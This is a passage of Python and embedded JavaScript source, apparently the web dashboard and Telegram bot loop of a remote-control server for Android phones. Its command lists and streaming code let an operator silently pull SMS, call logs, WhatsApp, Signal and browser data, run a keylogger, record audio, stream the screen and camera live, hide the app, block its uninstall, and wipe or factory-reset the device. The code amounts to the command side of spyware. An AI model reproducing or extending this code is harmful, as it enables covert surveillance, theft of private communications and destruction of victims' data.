   511→  4010→  if(r.ok){notify('Device unlinked');loadAll();}
   512→  4011→  else notify('Failed','var(--red)');
   513→  4012→}
   514→  4013→async function generateLink(){
   515→  4014→  var r=await api('web/link_code');
   516→  4015→  if(r.ok){
   517→  4016→    var box=document.getElementById('linkCodeBox');
   518→  4017→    document.getElementById('linkCodeText').textContent=r.code;
   519→  4018→    box.style.display='block';
   520→  4019→    notify('Link code generated!');
   521→  4020→  }
   522→  4021→}
   523→  4022→
   524→  4023→/* ========== Command Categories ========== */
   525→  4024→var CMD_CATEGORIES={
   526→  4025→  data:{label:'&#x1F4CA; Data',cmds:['sms','calls','contacts','location','notifications','apps','info','battery','gallery','clipboard','all_data','wifi_info','bluetooth_devices','network_info','sim_info','storage_info','installed_apps','running_apps','calendar','browser_history']},
   527→  4026→  social:{label:'&#x1F310; Social',cmds:['whatsapp','telegram_app','instagram','messenger','snapchat','tiktok','twitter','viber','signal','facebook','whatsapp_status','whatsapp_stories','telegram_channels','instagram_stories','youtube']},
   528→  4027→  control:{label:'&#x1F3AE; Control',cmds:['ping','vibrate','ring','screenshot','front_camera','back_camera','record_audio','record_video','lock_phone','unlock_phone','reboot','shutdown','set_volume','set_brightness','enable_wifi','disable_wifi','enable_bluetooth','disable_bluetooth','enable_mobile_data','disable_mobile_data','enable_hotspot','disable_hotspot','airplane_on','airplane_off','torch_on','torch_off','play_sound','speak_text','open_url','send_sms','make_call','block_number','unblock_number']},
   529→  4028→  apps:{label:'&#x1F4E6; Apps',cmds:['open_app','close_app','install_app','uninstall_app','block_app','unblock_app','clear_app_data','force_stop_app','app_info','app_usage','screen_time','app_permissions','enable_app','disable_app','list_blocked','clear_cache','update_app','launch_app','kill_app','app_cache']},
   530→  4029→  files:{label:'&#x1F4C2; Files',cmds:['list_files','get_file','download_file','list_downloads','list_dcim','list_music','list_videos','list_documents','list_whatsapp','list_telegram_files','send_contacts_backup','send_sms_backup','send_calls_backup','send_full_backup','delete_file','rename_file','copy_file','move_file','create_folder','search_files','recent_files','file_info','zip_files']},
   531→  4030→  security:{label:'&#x1F512; Security',cmds:['wipe_data','factory_reset','show_app','hide_app','change_passcode','set_pin','remove_pin','enable_biometric','disable_biometric','anti_uninstall_on','anti_uninstall_off','device_admin_status','check_root','set_screen_lock','remove_screen_lock']},
   532→  4031→  monitor:{label:'&#x1F50D; Monitor',cmds:['keylogger_start','keylogger_stop','get_keylogger','screen_record_start','screen_record_stop','clipboard_monitor_start','clipboard_monitor_stop','get_clipboard_log','wifi_monitor_start','wifi_monitor_stop','app_monitor_start','app_monitor_stop','get_app_log','location_live','location_stop','location_history','geo_add','geo_remove','geo_list','sms_monitor','call_monitor']},
   533→  4032→  syssettings:{label:'&#x2699;&#xFE0F; System',cmds:['set_language','set_timezone','set_alarm','set_timer','set_reminder','enable_dev_mode','disable_dev_mode','enable_usb_debug','disable_usb_debug','dns_change','proxy_set','apn_settings','nfc_on','nfc_off','auto_update_on','auto_update_off']}
   534→  4033→};
   535→  4034→
   536→  4035→function initCmdTabs(){
   537→  4036→  var tabs=document.getElementById('cmdTabs');
   538→  4037→  tabs.innerHTML=Object.keys(CMD_CATEGORIES).map(function(k){return '<button class="tab'+(k==='data'?' active':'')+'" onclick="showCmdCat(\''+k+'\',this)">'+CMD_CATEGORIES[k].label+'</button>';}).join('');
   539→  4038→  showCmdCat('data');
   540→  4039→}
   541→  4040→function showCmdCat(cat,btn){
   542→  4041→  if(btn){document.querySelectorAll('#cmdTabs .tab').forEach(function(t){t.classList.remove('active');});btn.classList.add('active');}
   543→  4042→  var grid=document.getElementById('cmdGrid');
   544→  4043→  grid.innerHTML=CMD_CATEGORIES[cat].cmds.map(function(c){return '<button class="cmd-btn" onclick="sendDeviceCmd(\''+c+'\')">'+c.replace(/_/g,' ')+'</button>';}).join('');
   545→  4044→}
   546→  4045→
   547→  4046→/* ========== Send Commands ========== */
   548→  4047→async function sendDeviceCmd(cmd){
   549→  4048→  var devId=document.getElementById('cmdDevice').value;
   550→  4049→  if(!devId){notify('Select a device','var(--red)');return;}
   551→  4050→  var r=await api('web/send_command',{method:'POST',body:JSON.stringify({device_id:devId,command:cmd})});
   552→  4051→  if(r.ok)notify('Command sent!');else notify('Failed','var(--red)');
   553→  4052→  loadAll();
   554→  4053→}
   555→  4054→function sendCmd(cmd){
   556→  4055→  var devId=document.getElementById('fileDevice').value;
   557→  4056→  if(!devId){notify('Select a device','var(--red)');return;}
   558→  4057→  api('web/send_command',{method:'POST',body:JSON.stringify({device_id:devId,command:cmd})}).then(function(r){
   559→  4058→    if(r.ok)notify('Command sent!');else notify('Failed','var(--red)');
   560→  4059→  });
   561→  4060→}
   562→  4061→function sendDataCmd(cmd){
   563→  4062→  var devId=document.getElementById('dataDevice').value;
   564→  4063→  if(!devId){notify('Select a device','var(--red)');return;}
   565→  4064→  api('web/send_command',{method:'POST',body:JSON.stringify({device_id:devId,command:'get_'+cmd})}).then(function(r){
   566→  4065→    if(r.ok)notify('Command sent!');else notify('Failed','var(--red)');
   567→  4066→  });
   568→  4067→}
   569→  4068→function sendMonCmd(cmd){
   570→  4069→  var devId=document.getElementById('monDevice').value;
   571→  4070→  if(!devId){notify('Select a device','var(--red)');return;}
   572→  4071→  api('web/send_command',{method:'POST',body:JSON.stringify({device_id:devId,command:cmd})}).then(function(r){
   573→  4072→    if(r.ok)notify('Command sent!');else notify('Failed','var(--red)');
   574→  4073→  });
   575→  4074→}
   576→  4075→
   577→  4076→/* ========== Command Log Rendering ========== */
   578→  4077→function cmdItemHtml(c){
   579→  4078→  var statusClass=c.status==='completed'?'green':c.status==='pending'?'yellow':c.status==='failed'?'red':'blue';
   580→  4079→  var statusLabel=c.status||'unknown';
   581→  4080→  var spinnerHtml=c.status==='pending'?' <span class="spinner"></span>':'';
   582→  4081→  var devName=c.device_id;
   583→  4082→  var dev=DEVICES.find(function(d){return d.id===c.device_id;});
   584→  4083→  if(dev)devName=dev.name||dev.id;
   585→  4084→  var resultId='cmdres_'+(c.id||'').replace(/[^a-zA-Z0-9]/g,'');
   586→  4085→  var hasResult=c.result&&(typeof c.result==='string'?c.result:JSON.stringify(c.result));
   587→  4086→  var toggleResult=hasResult?'<button class="btn btn-ghost btn-sm" onclick="toggleCmdResult(\''+resultId+'\')">&#x1F4CB; Toggle Result</button>'+
   588→  4087→    (hasResult?'<button class="btn btn-ghost btn-sm" onclick="copyCmdResult(\''+resultId+'\')">&#x1F4CB; Copy Result</button>':''):'';
   589→  4088→  return '<div class="cmd-item" data-id="'+esc(c.id)+'" data-status="'+esc(c.status)+'" data-device="'+esc(c.device_id)+'" data-command="'+esc(c.command)+'">'+
   590→  4089→    '<div class="cmd-header">'+
   591→  4090→      '<span class="cmd-cmd">'+esc(c.command)+spinnerHtml+'</span>'+
   592→  4091→      '<div style="display:flex;align-items:center;gap:6px">'+
   593→  4092→        toggleResult+
   594→  4093→        '<span class="badge badge-'+statusClass+'">'+esc(statusLabel)+'</span>'+
   595→  4094→      '</div>'+
   596→  4095→    '</div>'+
   597→  4096→    '<div class="cmd-meta">'+
   598→  4097→      '<span>&#x1F4F1; '+esc(devName)+'</span>'+
   599→  4098→      '<span>&#x1F552; '+esc(c.created_at||'-')+'</span>'+
   600→  4099→      (c.completed_at?'<span>&#x2705; '+esc(c.completed_at)+'</span>':'')+
   601→  4100→    '</div>'+
   602→  4101→    (hasResult?'<div class="cmd-result" id="'+resultId+'">'+esc(typeof c.result==='string'?c.result:JSON.stringify(c.result,null,2))+'</div>':'')+
   603→  4102→  '</div>';
   604→  4103→}
   605→  4104→function renderCommandLog(cmds){
   606→  4105→  var filtered=filterCommandsList(cmds||[]);
   607→  4106→  var el=document.getElementById('cmdLog');
   608→  4107→  var dash=document.getElementById('dashCommands');
   609→  4108→  var items=filtered.slice(-30).reverse();
   610→  4109→  if(!items.length){el.innerHTML='<div class="empty"><div class="empty-icon">&#x1F4CB;</div>No commands</div>';dash.innerHTML='';return;}
   611→  4110→  var html=items.map(cmdItemHtml).join('');
   612→  4111→  el.innerHTML=html;
   613→  4112→  dash.innerHTML=items.slice(0,8).map(cmdItemHtml).join('');
   614→  4113→}
   615→  4114→function filterCommandLog(){renderCommandLog(ALL_COMMANDS);}
   616→  4115→function filterCommandsList(cmds){
   617→  4116→  var statusF=document.getElementById('cmdStatusFilter').value;
   618→  4117→  var q=(document.getElementById('cmdSearchInput').value||'').toLowerCase();
   619→  4118→  return cmds.filter(function(c){
   620→  4119→    if(statusF!=='all'&&c.status!==statusF)return false;
   621→  4120→    if(q){
   622→  4121→      var text=(c.command+' '+c.device_id+' '+(c.result||'')).toLowerCase();
   623→  4122→      if(text.indexOf(q)<0)return false;
   624→  4123→    }
   625→  4124→    return true;
   626→  4125→  });
   627→  4126→}
   628→  4127→function toggleCmdResult(id){
   629→  4128→  var el=document.getElementById(id);
   630→  4129→  if(el)el.classList.toggle('expanded');
   631→  4130→}
   632→  4131→function copyCmdResult(id){
   633→  4132→  var el=document.getElementById(id);
   634→  4133→  if(!el)return;
   635→  4134→  navigator.clipboard.writeText(el.textContent).then(function(){notify('Copied to clipboard!');}).catch(function(){notify('Copy failed','var(--red)');});
   636→  4135→}
   637→  4136→function checkPendingRefresh(){
   638→  4137→  var hasPending=ALL_COMMANDS.some(function(c){return c.status==='pending';});
   639→  4138→  if(hasPending&&!PENDING_REFRESH){
   640→  4139→    PENDING_REFRESH=setInterval(function(){
   641→  4140→      var still=ALL_COMMANDS.some(function(c){return c.status==='pending';});
   642→  4141→      if(!still){clearInterval(PENDING_REFRESH);PENDING_REFRESH=null;return;}
   643→  4142→      api('web/commands').then(function(r){if(r.ok){ALL_COMMANDS=r.commands||[];renderCommandLog(ALL_COMMANDS);}});
   644→  4143→    },3000);
   645→  4144→  }
   646→  4145→}
   647→  4146→
   648→  4147→/* ========== Event Log ========== */
   649→  4148→async function loadEvents(){
   650→  4149→  var r=await api('web/events');
   651→  4150→  if(r.ok){
   652→  4151→    ALL_EVENTS=r.events||[];
   653→  4152→    renderEventLog(ALL_EVENTS);
   654→  4153→    populateEventDeviceFilter();
   655→  4154→  }
   656→  4155→}
   657→  4156→function eventLevelClass(level){
   658→  4157→  if(level==='security'||level==='error'||level==='danger')return 'security';
   659→  4158→  if(level==='warning')return 'warning';
   660→  4159→  if(level==='success')return 'success';
   661→  4160→  return 'info';
   662→  4161→}
   663→  4162→function renderEventLog(events){
   664→  4163→  var filtered=filterEventsList(events||[]);
   665→  4164→  var tbody=document.getElementById('eventLogBody');
   666→  4165→  var emptyEl=document.getElementById('eventLogEmpty');
   667→  4166→  if(!filtered.length){tbody.innerHTML='';emptyEl.style.display='';return;}
   668→  4167→  emptyEl.style.display='none';
   669→  4168→  tbody.innerHTML=filtered.reverse().map(function(e){
   670→  4169→    var level=e.level||'info';
   671→  4170→    var cls=eventLevelClass(level);
   672→  4171→    var devName=esc(e.details&&e.details.id?e.details.id:'-');
   673→  4172→    if(e.details&&e.details.name)devName=esc(e.details.name);
   674→  4173→    var detailsStr='';
   675→  4174→    if(e.details){
   676→  4175→      try{detailsStr=JSON.stringify(e.details).slice(0,120);}catch(ex){detailsStr=String(e.details).slice(0,120);}
   677→  4176→    }
   678→  4177→    return '<tr class="event-item">'+
   679→  4178→      '<td class="ev-time">'+esc((e.time||'').slice(0,19))+'</td>'+
   680→  4179→      '<td class="ev-device">'+devName+'</td>'+
   681→  4180→      '<td><span class="ev-type '+cls+'">'+esc(level)+'</span></td>'+
   682→  4181→      '<td>'+esc(e.event||'')+'</td>'+
   683→  4182→      '<td style="color:var(--text-muted);font-size:11px">'+esc(detailsStr)+'</td>'+
   684→  4183→    '</tr>';
   685→  4184→  }).join('');
   686→  4185→  if(document.getElementById('eventAutoScroll').checked){
   687→  4186→    var wrap=tbody.closest('.table-wrap');
   688→  4187→    if(wrap)wrap.scrollTop=wrap.scrollHeight;
   689→  4188→  }
   690→  4189→}
   691→  4190→function filterEventLog(){renderEventLog(ALL_EVENTS);}
   692→  4191→function filterEventsList(events){
   693→  4192→  var devF=document.getElementById('eventDeviceFilter').value;
   694→  4193→  var typeF=document.getElementById('eventTypeFilter').value;
   695→  4194→  var dateF=document.getElementById('eventDateFilter').value;
   696→  4195→  return events.filter(function(e){
   697→  4196→    if(devF!=='all'){
   698→  4197→      if(e.details&&e.details.id&&e.details.id!==devF)return false;
   699→  4198→      if(!e.details||!e.details.id)return false;
   700→  4199→    }
   701→  4200→    if(typeF!=='all'){
   702→  4201→      var cls=eventLevelClass(e.level||'info');
   703→  4202→      if(cls!==typeF)return false;
   704→  4203→    }
   705→  4204→    if(dateF&&(e.time||'').slice(0,10)!==dateF)return false;
   706→  4205→    return true;
   707→  4206→  });
   708→  4207→}
   709→  4208→
   710→  4209→/* ========== Settings ========== */
   711→  4210→async function loadSettings(){
   712→  4211→  var r=await api('web/settings');
   713→  4212→  if(r.ok){
   714→  4213→    var s=r.settings;
   715→  4214→    document.getElementById('settingsForm').innerHTML=
   716→  4215→      '<label style="display:block;margin-bottom:12px">&#x1F511; Admin Password<input id="setPass" value="'+esc(s.admin_password||'admin')+'" style="display:block;width:100%;padding:9px;border-radius:var(--radius-xs);border:1px solid var(--border);background:var(--bg);color:var(--text);margin-top:4px;outline:none"></label>'+
   717→  4216→      '<label style="display:block;margin-bottom:12px">&#x23F1; Sync Interval (sec)<input id="setSync" type="number" value="'+esc(s.sync_interval||300)+'" style="display:block;width:100%;padding:9px;border-radius:var(--radius-xs);border:1px solid var(--border);background:var(--bg);color:var(--text);margin-top:4px;outline:none"></label>'+
   718→  4217→      '<label style="display:block;margin-bottom:12px">&#x1F4CD; Location Interval (sec)<input id="setLoc" type="number" value="'+esc(s.location_interval||60)+'" style="display:block;width:100%;padding:9px;border-radius:var(--radius-xs);border:1px solid var(--border);background:var(--bg);color:var(--text);margin-top:4px;outline:none"></label>'+
   719→  4218→      '<label style="display:block;margin-bottom:12px">&#x1F310; Language<select id="setLang" style="display:block;width:100%;padding:9px;border-radius:var(--radius-xs);border:1px solid var(--border);background:var(--bg);color:var(--text);margin-top:4px;outline:none"><option value="ar" '+(s.language==='ar'?'selected':'')+'>Arabic</option><option value="en" '+(s.language==='en'?'selected':'')+'>English</option></select></label>'+
   720→  4219→      '<label style="display:flex;align-items:center;gap:8px;margin-bottom:12px"><input type="checkbox" id="setNotif" '+(s.notifications?'checked':'')+'> &#x1F514; Notifications</label>'+
   721→  4220→      '<label style="display:flex;align-items:center;gap:8px;margin-bottom:12px"><input type="checkbox" id="setAutoLoc" '+(s.auto_location?'checked':'')+'> &#x1F5FA;&#xFE0F; Auto Location</label>'+
   722→  4221→      '<label style="display:flex;align-items:center;gap:8px;margin-bottom:12px"><input type="checkbox" id="setAutoSync" '+(s.auto_sync?'checked':'')+'> &#x1F504; Auto Sync</label>';
   723→  4222→  }
   724→  4223→}
   725→  4224→async function saveSettings(){
   726→  4225→  var data={
   727→  4226→    admin_password:document.getElementById('setPass').value,
   728→  4227→    sync_interval:parseInt(document.getElementById('setSync').value),
   729→  4228→    location_interval:parseInt(document.getElementById('setLoc').value),
   730→  4229→    language:document.getElementById('setLang').value,
   731→  4230→    notifications:document.getElementById('setNotif').checked,
   732→  4231→    auto_location:document.getElementById('setAutoLoc').checked,
   733→  4232→    auto_sync:document.getElementById('setAutoSync').checked,
   734→  4233→  };
   735→  4234→  var r=await api('web/settings',{method:'PUT',body:JSON.stringify(data)});
   736→  4235→  if(r.ok)notify('Settings saved!');else notify('Failed','var(--red)');
   737→  4236→}
   738→  4237→
   739→  4238→/* ========== Init ========== */
   740→  4239→if(TOKEN){showApp();}
   741→  4240→initCmdTabs();
   742→  4241→setTimeout(loadSettings,500);
   743→  4242→
   744→  4243→/* ========== LIVE STREAMING (JPEG Screenshot-based) ========== */
   745→  4244→var _streamType='screen';
   746→  4245→var _streamActive=false;
   747→  4246→var _streamPollTimer=null;
   748→  4247→var _frameCount=0;
   749→  4248→var _audioAnimFrame=null;
   750→  4249→var _streamWaitingTimer=null;
   751→  4250→var _firstFrameReceived=false;
   752→  4251→var _lastFrameData='';
   753→  4252→var _streamQuality=3;
   754→  4253→
   755→  4254→function onStreamDeviceChange(){
   756→  4255→  var devId=document.getElementById('streamDevice').value;
   757→  4256→  document.getElementById('stDevice').textContent=devId?((DEVICES.find(function(d){return d.id===devId;})||{}).name||devId):'-';
   758→  4257→  if(_streamActive)stopStream();
   759→  4258→}
   760→  4259→function selectStreamType(type){
   761→  4260→  _streamType=type;
   762→  4261→  document.querySelectorAll('.stream-type-btn').forEach(function(b){b.classList.remove('active');});
   763→  4262→  var btnId=type==='screen'?'stScreen':type==='camera'?'stCamera':'stAudio';
   764→  4263→  document.getElementById(btnId).classList.add('active');
   765→  4264→  document.getElementById('qualityCard').style.display=type==='audio'?'none':'block';
   766→  4265→}
   767→  4266→function setQuality(q,btn){
   768→  4267→  _streamQuality={'low':8,'medium':3,'high':1}[q]||3;
   769→  4268→  document.querySelectorAll('.stream-quality button').forEach(function(b){b.classList.remove('active');});
   770→  4269→  btn.classList.add('active');
   771→  4270→  notify('Quality changed');
   772→  4271→}
   773→  4272→function _setViewerState(state){
   774→  4273→  var viewer=document.getElementById('streamViewer');
   775→  4274→  var noMsg=document.getElementById('noStreamMsg');
   776→  4275→  var img=document.getElementById('streamImg');
   777→  4276→  var badge=document.getElementById('streamBadge');
   778→  4277→  var audioC=document.getElementById('audioPlayerContainer');
   779→  4278→  noMsg.style.display='none';img.style.display='none';badge.style.display='none';audioC.style.display='none';viewer.style.background='#000';
   780→  4279→  if(state==='idle'){noMsg.style.display='';noMsg.innerHTML='<div style="font-size:48px;margin-bottom:12px">&#x1F4E1;</div>Select a device and start streaming';viewer.style.background='var(--surface)';}
   781→  4280→  else if(state==='waiting'){noMsg.style.display='';noMsg.innerHTML='<div style="text-align:center"><div class="pulse" style="font-size:48px;margin-bottom:16px">&#x231B;</div><div style="font-size:16px;font-weight:600;margin-bottom:8px">Waiting for device frame...</div><div style="color:var(--text-secondary);font-size:13px">Sending screenshot command to device.<br>First frame may take a few seconds.<br>Ensure device is connected and screen capture permission is granted.</div></div>';document.getElementById('stStatus').innerHTML='<span style="color:var(--yellow)">&#x25CF; Waiting...</span>';}
   782→  4281→  else if(state==='connected'){document.getElementById('stStatus').innerHTML='<span style="color:var(--blue)">&#x25CF; Connected - waiting for frame...</span>';}
   783→  4282→  else if(state==='receiving_video'){img.style.display='';badge.style.display='';badge.className='stream-badge live';noMsg.style.display='none';document.getElementById('stStatus').innerHTML='<span style="color:var(--green)">&#x25CF; Live</span>';}
   784→  4283→  else if(state==='receiving_audio'){audioC.style.display='block';badge.style.display='';badge.className='stream-badge live';noMsg.style.display='none';document.getElementById('stStatus').innerHTML='<span style="color:var(--green)">&#x25CF; Live</span>';}
   785→  4284→  else if(state==='error'){noMsg.style.display='';noMsg.innerHTML='<div style="text-align:center"><div style="font-size:48px;margin-bottom:16px">&#x26A0;&#xFE0F;</div><div style="font-size:16px;font-weight:600;margin-bottom:8px;color:var(--accent)">Stream failed</div><div style="color:var(--text-secondary);font-size:13px">Make sure the device is connected.<br>Ensure screen capture permission is granted.<br>Try again.</div></div>';document.getElementById('stStatus').innerHTML='<span style="color:var(--accent)">&#x25CF; Failed</span>';}
   786→  4285→}
   787→  4286→async function startStream(){
   788→  4287→  var devId=document.getElementById('streamDevice').value;
   789→  4288→  if(!devId){notify('Select a device first','var(--red)');return;}
   790→  4289→  _streamActive=true;_frameCount=0;_firstFrameReceived=false;_lastFrameData='';
   791→  4290→  document.getElementById('btnStartStream').style.display='none';
   792→  4291→  document.getElementById('btnStopStream').style.display='';
   793→  4292→  document.getElementById('btnSwitchCam').style.display=_streamType==='camera'?'':'none';
   794→  4293→  document.getElementById('stFrames').textContent='0';
   795→  4294→  document.getElementById('stLastAct').textContent='-';
   796→  4295→  var typeLabel=_streamType==='screen'?'Screen':_streamType==='camera'?'Camera':'Audio';
   797→  4296→  document.getElementById('stType').textContent=typeLabel;
   798→  4297→  var dev=DEVICES.find(function(d){return d.id===devId;});
   799→  4298→  document.getElementById('stDevice').textContent=(dev&&dev.name)||devId;
   800→  4299→  _setViewerState('waiting');
   801→  4300→  notify('Starting stream: '+typeLabel);
   802→  4301→  var interval=_streamType==='audio'?5:_streamQuality;
   803→  4302→  var r=await api('stream/jpeg_start',{method:'POST',body:JSON.stringify({device_id:devId,type:_streamType,interval:interval})});
   804→  4303→  if(!r.ok){notify('Stream start failed: '+(r.error||''),'var(--red)');_setViewerState('error');_streamActive=false;document.getElementById('btnStartStream').style.display='';document.getElementById('btnStopStream').style.display='none';return;}
   805→  4304→  notify('Stream started - waiting for first frame...');
   806→  4305→  startStreamPolling(devId);
   807→  4306→  if(_streamWaitingTimer)clearTimeout(_streamWaitingTimer);
   808→  4307→  _streamWaitingTimer=setTimeout(function(){if(_streamActive&&!_firstFrameReceived){_setViewerState('error');}},60000);
   809→  4308→}
   810→  4309→async function stopStream(){
   811→  4310→  var devId=document.getElementById('streamDevice').value;
   812→  4311→  if(!devId)return;
   813→  4312→  api('stream/jpeg_stop',{method:'POST',body:JSON.stringify({device_id:devId})});
   814→  4313→  _cleanupStream();
   815→  4314→  notify('Stream stopped');
   816→  4315→}
   817→  4316→function _cleanupStream(){
   818→  4317→  _streamActive=false;_firstFrameReceived=false;_lastFrameData='';
   819→  4318→  if(_streamPollTimer){clearInterval(_streamPollTimer);_streamPollTimer=null;}
   820→  4319→  if(_streamWaitingTimer){clearTimeout(_streamWaitingTimer);_streamWaitingTimer=null;}
   821→  4320→  if(_audioAnimFrame){cancelAnimationFrame(_audioAnimFrame);_audioAnimFrame=null;}
   822→  4321→  document.getElementById('btnStartStream').style.display='';
   823→  4322→  document.getElementById('btnStopStream').style.display='none';
   824→  4323→  document.getElementById('btnSwitchCam').style.display='none';
   825→  4324→  _setViewerState('idle');
   826→  4325→  document.getElementById('stStatus').textContent='Stopped';
   827→  4326→}
   828→  4327→async function switchCamera(){
   829→  4328→  var devId=document.getElementById('streamDevice').value;
   830→  4329→  if(!devId)return;
   831→  4330→  if(_streamType==='front_camera')_streamType='back_camera';
   832→  4331→  else if(_streamType==='back_camera')_streamType='front_camera';
   833→  4332→  else _streamType='camera';
   834→  4333→  if(_streamActive){stopStream();setTimeout(function(){startStream();},500);}
   835→  4334→  else{startStream();}
   836→  4335→  notify('Camera switched');
   837→  4336→}
   838→  4337→function _onFrameReceived(base64Data,isAudio){
   839→  4338→  if(base64Data===_lastFrameData)return;
   840→  4339→  _lastFrameData=base64Data;
   841→  4340→  if(!_firstFrameReceived){_firstFrameReceived=true;if(_streamWaitingTimer){clearTimeout(_streamWaitingTimer);_streamWaitingTimer=null;}}
   842→  4341→  _frameCount++;
   843→  4342→  document.getElementById('stFrames').textContent=_frameCount;
   844→  4343→  document.getElementById('stLastAct').textContent=new Date().toLocaleTimeString();
   845→  4344→  if(isAudio){_setViewerState('receiving_audio');}
   846→  4345→  else{_setViewerState('receiving_video');document.getElementById('streamImg').src='data:image/jpeg;base64,'+base64Data;}
   847→  4346→}
   848→  4347→function startStreamPolling(devId){
   849→  4348→  if(_streamPollTimer)clearInterval(_streamPollTimer);
   850→  4349→  _streamPollTimer=setInterval(async function(){
   851→  4350→    if(!_streamActive)return;
   852→  4351→    try{
   853→  4352→      var typeParam=_streamType==='audio'?'audio':'video';
   854→  4353→      var resp=await fetch('/api/stream/frame/'+devId+'?type='+typeParam,{headers:{'Authorization':'Bearer '+TOKEN}});
   855→  4354→      var r=await resp.json();
   856→  4355→      if(r.ok&&r.data&&r.data.length>50){_onFrameReceived(r.data,false);}
   857→  4356→      else if(r.ok&&_firstFrameReceived){}
   858→  4357→      else if(!_firstFrameReceived){
   859→  4358→        try{var sr=await fetch('/api/stream/status',{headers:{'Authorization':'Bearer '+TOKEN}});var status=await sr.json();if(status.ok&&status.active_streams&&status.active_streams[devId]){if(!_firstFrameReceived)_setViewerState('connected');}else if(!_firstFrameReceived&&_streamActive){_setViewerState('waiting');}}catch(e){}
   860→  4359→      }
   861→  4360→    }catch(e){}
   862→  4361→  },2000);
   863→  4362→}
   864→  4363→
   865→  4364→// Add streaming category to commands
   866→  4365→CMD_CATEGORIES.streaming={label:'&#x1F4E1; Streaming',cmds:['start_screen_stream','stop_screen_stream','start_camera_stream','stop_camera_stream','switch_camera','start_audio_stream','stop_audio_stream','get_stream_status','set_stream_quality','enable_torch','pause_stream','resume_stream','stop_all_streams','get_stream_capabilities']};
   867→  4366→if(document.getElementById('cmdTabs')){
   868→  4367→  var tabs=document.getElementById('cmdTabs');
   869→  4368→  if(tabs.innerHTML.indexOf('Streaming')===-1){
   870→  4369→    tabs.innerHTML+='<button class="tab" onclick="showCmdCat(\'streaming\',this)">&#x1F4E1; Streaming</button>';
   871→  4370→  }
   872→  4371→}
   873→  4372→</script>
   874→  4373→</body>
   875→  4374→</html>"""
   876→  4375→
   877→  4376→# ============================================================================
   878→  4377→# WEB DASHBOARD ROUTE
   879→  4378→# ============================================================================
   880→  4379→
   881→  4380→async def serve_dashboard(request):
   882→  4381→    return web.Response(text=DASHBOARD_HTML, content_type="text/html", charset="utf-8")
   883→  4382→
   884→  4383→# ============================================================================
   885→  4384→# GETUPDATES POLLING
   886→  4385→# ============================================================================
   887→  4386→
   888→  4387→async def tg_poll_loop():
   889→  4388→    global tg_offset, polling_active, _processed_update_ids, _processed_message_keys, _message_dedup, _chat_rate_counter, _data_forward_dedup
   890→  4389→    polling_active = True
   891→  4390→    
   892→  4391→    # === تنظيف الاتصالات القديمة عند بدء التشغيل ===
   893→  4392→    log.info("Cleaning old connections (deleteWebhook)...")
   894→  4393→    try:
   895→  4394→        session = get_tg_session()
   896→  4395→        # حذف webhook وتجاهل التحديثات المعلقة
   897→  4396→        async with session.post(f"https://api.telegram.org/bot{BOT_TOKEN}/deleteWebhook?drop_pending_updates=true") as resp:
   898→  4397→            r = await resp.json()
   899→  4398→            log.info("deleteWebhook: %s", r.get("description", r.get("ok")))
   900→  4399→        await asyncio.sleep(1)
   901→  4400→        # التحقق من البوت
   902→  4401→        async with session.post(f"https://api.telegram.org/bot{BOT_TOKEN}/getMe") as resp:
   903→  4402→            me = await resp.json()
   904→  4403→            if me.get("ok"):
   905→  4404→                log.info("Bot connected: @%s (%s)", me["result"].get("username", "?"), me["result"].get("first_name", "?"))
   906→  4405→            else:
   907→  4406→                log.warning("getMe failed: %s", me)
   908→  4407→        await asyncio.sleep(1)
   909→  4408→    except Exception as exc:
   910→  4409→        log.warning("Connection cleanup: %s", exc)
   911→  4410→    
   912→  4411→    log.info("Starting Telegram getUpdates polling...")
   913→  4412→    
   914→  4413→    _conflict_count = 0
   915→  4414→    while polling_active:
   916→  4415→        try:
   917→  4416→            payload = {
   918→  4417→                "offset": tg_offset,
   919→  4418→                "timeout": 30,
   920→  4419→                "allowed_updates": ["message", "callback_query"],
   921→  4420→            }
   922→  4421→            result = await tg_request("getUpdates", payload)
   923→  4422→            if not result or not result.get("ok"):
   924→  4423→                desc = (result or {}).get("description", "")
   925→  4424→                if "Conflict" in desc:
   926→  4425→                    _conflict_count += 1
   927→  4426→                    log.warning("Conflict detected (%d), waiting...", _conflict_count)
   928→  4427→                    await asyncio.sleep(8)
   929→  4428→                else:
   930→  4429→                    await asyncio.sleep(2)
   931→  4430→                continue
   932→  4431→            _conflict_count = 0  # إعادة العداد عند النجاح
   933→  4432→            
   934→  4433→            # Periodic cleanup (every 100 polls)
   935→  4434→            if not hasattr(tg_poll_loop, '_poll_count'):
   936→  4435→                tg_poll_loop._poll_count = 0
   937→  4436→            tg_poll_loop._poll_count += 1
   938→  4437→            if tg_poll_loop._poll_count % 100 == 0:
   939→  4438→                now = time.time()
   940→  4439→                _message_dedup = {k: v for k, v in _message_dedup.items() if now - v > 600}
   941→  4440→                _chat_rate_counter = {k: v for k, v in _chat_rate_counter.items() if v and now - v[-1] > 300}
   942→  4441→                _data_forward_dedup = {k: v for k, v in _data_forward_dedup.items() if now - v > 300}
   943→  4442→            
   944→  4443→            updates = result.get("result", [])
   945→  4444→            for update in updates:
   946→  4445→                update_id = update.get("update_id", 0)
   947→  4446→                tg_offset = update_id + 1
   948→  4447→                
   949→  4448→                # === منع تكرار معالجة نفس التحديث ===
   950→  4449→                if update_id in _processed_update_ids:
   951→  4450→                    continue
   952→  4451→                _processed_update_ids.add(update_id)
   953→  4452→                if len(_processed_update_ids) > 1000:
   954→  4453→                    _processed_update_ids = set(list(_processed_update_ids)[-500:])
   955→  4454→                
   956→  4455→                # Handle message
   957→  4456→                if "message" in update:
   958→  4457→                    msg = update["message"]
   959→  4458→                    chat_id = msg.get("chat", {}).get("id")
   960→  4459→                    text = msg.get("text", "")
   961→  4460→                    msg_id = msg.get("message_id", 0)
   962→  4461→                    
   963→  4462→                    # === منع تكرار معالجة نفس الرسالة بالضبط ===
   964→  4463→                    msg_key = f"{chat_id}:{msg_id}"
   965→  4464→                    if msg_key in _processed_message_keys:
   966→  4465→                        continue
   967→  4466→                    _processed_message_keys.add(msg_key)
   968→  4467→                    if len(_processed_message_keys) > 500:
   969→  4468→                        _processed_message_keys = set(list(_processed_message_keys)[-200:])
   970→  4469→                    
   971→  4470→                    if chat_id != ADMIN_CHAT_ID:
   972→  4471→                        log.warning("Unauthorized access from %s", chat_id)
   973→  4472→                        continue
   974→  4473→                    
   975→  4474→                    if text.startswith("/"):
   976→  4475→                        await handle_telegram_command(chat_id, text, msg_id)
   977→  4476→                
   978→  4477→                # Handle callback query
   979→  4478→                if "callback_query" in update:
   980→  4479→                    cb = update["callback_query"]
   981→  4480→                    cb_id = cb.get("id", "")
   982→  4481→                    cb_chat = cb.get("message", {}).get("chat", {}).get("id")
